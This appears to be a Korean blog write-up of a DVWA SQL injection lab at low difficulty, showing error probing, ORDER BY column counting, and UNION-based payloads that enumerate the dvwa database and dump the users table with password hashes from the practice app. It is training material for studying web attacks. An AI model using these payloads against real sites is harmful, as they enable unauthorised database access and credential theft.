Oh! JUN
[DVWA] SQL INJECTION 실습 (Low Level) 본문
1. 취약점 분석
| INPUT | OUTPUT | |
| ' | You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1 | - 문법 오류 발생(MYSQL DB 사용하는거 알 수 있음) |
| 1 | ID: 1 First name: admin Surname: admin |
- ID : 1에 해당하는 First, Surname 정상 출력 |
| 2 | ID: 2 First name: Gordon Surname: Brown |
- ID : 2에 해당하는 First, Surname 정상 출력 |
| 2-1 | ID: 2-1 First name: Gordon Surname: Brown |
- 2-1 계산이 안됨 - 문자로 인식하는거 같음 |
2. DBMS 파악
- 취약점 분석에서 오류메시지에서 MYSQL임을 확인할 수 있음
3. 데이터 조회 공격
- User ID를 입력하면 ID값에 따라 First name, Surname이 변경되는것을 확인 할 수 있다.
- 즉 DB 데이터가 웹 페이지에 출력된다.
- UNION-BASED 공격을 실행해볼것이다.
4. UNION-BASED
| ' order by 1# | 정상 출력 |
| ' order by 2# | 정상 출력 |
| ' order by 3# | 에러 발생 |
| ' order by 4# | 에러 발생 |
| ' order by 5# | 에러 발생 |
- 'a' 와 'b'가 웹 페이지에 정상적으로 출력되는거 확인했다.
5. 목록화
| DATABASE | ||
| ' and 1=2 union all select database(), 'b'# | ID: ' and 1=2 union all select database(), 'b'# First name: dvwa Surname: b |
- DB명이 'dvwa' 확인 |
| TABLE | ||
| ' and 1=2 union all select (select count(*) from information_schema.tables where table_schema='dvwa'), 'b'# | ID: ' and 1=2 union all select (select count(*) from information_schema.tables where table_schema='dvwa'), 'b'# First name: 2 Surname: b |
- Table 개수 |
| ' and 1=2 union all select (select table_name from information_schema.tables where table_schema='dvwa' limit 0,1), 'b'# | ID: ' and 1=2 union all select (select table_name from information_schema.tables where table_schema='dvwa' limit 0,1), 'b'# First name: guestbook Surname: b |
- Table 이름 |
| ' and 1=2 union all select (select table_name from information_schema.tables where table_schema='dvwa' limit 1,1), 'b'# | ID: ' and 1=2 union all select (select table_name from information_schema.tables where table_schema='dvwa' limit 1,1), 'b'# First name: users Surname: b |
- Table 이름 |
| COLUMN | ||
| ' and 1=2 union all select (select count(*) from information_schema.columns where table_schema='dvwa' and table_name='users'), 'b'# | ID: ' and 1=2 union all select (select count(*) from information_schema.columns where table_schema='dvwa' and table_name='users'), 'b'# First name: 6 Surname: b |
- COLUMN 개수 |
| ' and 1=2 union all select (select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 0,1), 'b'# | ID: ' and 1=2 union all select (select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 0,1), 'b'# First name: user_id Surname: b |
- COLUMN 이름 |
| ' and 1=2 union all select (select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 1,1), 'b'# | ID: ' and 1=2 union all select (select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 1,1), 'b'# First name: first_name Surname: b |
- COLUMN 이름 |
| ' and 1=2 union all select (select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 2,1), 'b'# | ID: ' and 1=2 union all select (select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 2,1), 'b'# First name: last_name Surname: b |
- COLUMN 이름 |
| ' and 1=2 union all select (select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 3,1), 'b'# | ID: ' and 1=2 union all select (select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 3,1), 'b'# First name: user Surname: b |
- COLUMN 이름 |
| ' and 1=2 union all select (select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 4,1), 'b'# | ID: ' and 1=2 union all select (select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 4,1), 'b'# First name: password Surname: b |
- COLUMN 이름 |
| ' and 1=2 union all select (select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 5,1), 'b'# | ID: ' and 1=2 union all select (select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 5,1), 'b'# First name: avatar Surname: b |
- COLUMN 이름 |
| DATA | ||
| ' and 1=2 union all select (select count(*) from dvwa.users), 'b'# | ID: ' and 1=2 union all select (select count(*) from dvwa.users), 'b'# First name: 5 Surname: b |
- DATA 개수 |
| ' and 1=2 union all select (select concat(user_id, '###', first_name, '###', last_name, '###', user, '###', password, '###') from dvwa.users limit 0,1), null# | ID: ' and 1=2 union all select (select concat(user_id, '###', first_name, '###', last_name, '###', user, '###', password, '###') from dvwa.users limit 0,1), null# First name: 1###admin###admin###admin###5f4dcc3b5aa765d61d8327deb882cf99### Surname |
- DATA 내용 |
| ' and 1=2 union all select (select concat(user_id, '###', first_name, '###', last_name, '###', user, '###', password, '###') from dvwa.users limit 1,1), null# | ID: ' and 1=2 union all select (select concat(user_id, '###', first_name, '###', last_name, '###', user, '###', password, '###') from dvwa.users limit 1,1), null# First name: 2###Gordon###Brown###gordonb###e99a18c428cb38d5f260853678922e03### Surname |
- DATA 내용 |
| ' and 1=2 union all select (select concat(user_id, '###', first_name, '###', last_name, '###', user, '###', password, '###') from dvwa.users limit 2,1), null# | ID: ' and 1=2 union all select (select concat(user_id, '###', first_name, '###', last_name, '###', user, '###', password, '###') from dvwa.users limit 2,1), null# First name: 3###Hack###Me###1337###8d3533d75ae2c3966d7e0d4fcc69216b### Surname: |
- DATA 내용 |
| ' and 1=2 union all select (select concat(user_id, '###', first_name, '###', last_name, '###', user, '###', password, '###') from dvwa.users limit 3,1), null# | ID: ' and 1=2 union all select (select concat(user_id, '###', first_name, '###', last_name, '###', user, '###', password, '###') from dvwa.users limit 3,1), null# First name: 4###Pablo###Picasso###pablo###0d107d09f5bbe40cade3de5c71e9e9b7### Surname: |
- DATA 내용 |
| ' and 1=2 union all select (select concat(user_id, '###', first_name, '###', last_name, '###', user, '###', password, '###') from dvwa.users limit 4,1), null# | ID: ' and 1=2 union all select (select concat(user_id, '###', first_name, '###', last_name, '###', user, '###', password, '###') from dvwa.users limit 4,1), null# First name: 5###Bob###Smith###smithy###5f4dcc3b5aa765d61d8327deb882cf99### Surname: |
- DATA 내용 |
'웹 해킹 > SQL Injection' 카테고리의 다른 글
| 각 DBMS에 따른 Response-Based SQL 문법 테스트 (0) | 2022.09.17 |
|---|---|
| [DVWA] SQL Injection 실습 (Low Level, blind+비트) (0) | 2022.09.13 |
| 데이터 추론 기법(비트, ORACLE) 실습 (0) | 2022.09.01 |
| 데이터 추론 기법(비트, MYSQL) 실습 (0) | 2022.08.31 |
| 데이터 추론 기법(아스키코드) 실습 (0) | 2022.08.30 |
'웹 해킹/SQL Injection' Related Articles
more
